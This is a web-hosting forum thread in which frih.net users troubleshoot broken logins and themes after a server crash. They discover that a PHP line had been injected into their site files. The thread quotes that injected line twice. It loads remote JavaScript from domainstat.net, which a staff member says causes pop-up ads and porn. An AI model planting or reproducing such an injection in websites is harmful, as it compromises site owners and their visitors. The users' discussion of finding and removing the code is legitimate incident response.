after yesterday's apache crash on server 2, im not able to login to my website. im able to access the site (it shows up in the browser) , but there is something wrong with phpsessionid.the site is running simplemachines forum, and till before the crash, everything was working fine. ive tried everything from clearing the cookies to trying different browsers. another website that i visit on frih.net also seems to have some problem.

is something wrong with the server or is it only me??

I am experiencing similar problems. Before the crash my site was working fine, and now get it all messed up. I think the problem is not solved completely yet, or it may have caused some damage to the files or databases.
Also I cannot get into the admin zone.

Yes, Same problem with my phpbb forum http://scc.frih.net/ . It was working fine until one hour before.
nam_siddharth
When the problem will be solved? Any response please! I cannot login in my forum. Sad

bumping the post every two hours won't solve the problem.

I cleared cache of forum, and it is ok now. Smile

ok guys, ive found the cause for the problem. this line was included in my settings file somehow

Code:
<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=e9590c'></script>";}?>

i dont know how it was done, but it was there nevertheless. after removing the line, everything worked as usual!!

so can someone explain how it got there and what actually happened??

I also have problems on my webpage. When I try to visit it, I get error like "this theme is not available" but I know it 100% works and everything is correctly installed and configured. When I enter into admin area I also get message that database is available for update and I can click "Yes" to confirm this update.
My webpage was working for a few weeks without any problems except short downtimes which are global problem for server 2. But today, something really went wrong and I am asking you what to do now? I have only 1 week old database and I don't want to lose it. Sad

My url for website is http://elektro-scv.be

edit: I thing there are some database problems because I lost all settings

helppp Sad

That is right that same thing is happening to me yesterday I noticed something very extrange as I requested my site, Domainstats was loading, what does that mean?? Is this a virus??[/img]
Not only yesterday it is happening just now.
edit: Now it getting creepy this was supposed to be my admin login page:http://www.portalguadalajara.com.mx/administrator/
photon
does this mean that frihost was hacked??? how else can this script be present in many user's settings??
wumingsden
A hacker or worm has tried to deface the frih.net sites, yes. The code

Code:

<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=4fe6d'></script>";}?>

is probably present in most people's sites, especially the files that have the CHMOD 777. This code should be deleted. it causes ads to pop-up as well as porn movies. An announcement will be made shortly about this, as well as new settings that have had to be changed.
maclui
it is also affecting non 777 files.

Are you sure, could you give me an example ? It is now known that .php and .html files are affected but only when the file, or folder, has a chmod of 777. These files are only affected because they are writable by the whole server. What was the CHMOD that was affected, 755 ?
maclui
The folder has a 755 but the files inside are 644, and all .php are contaminated with the code.
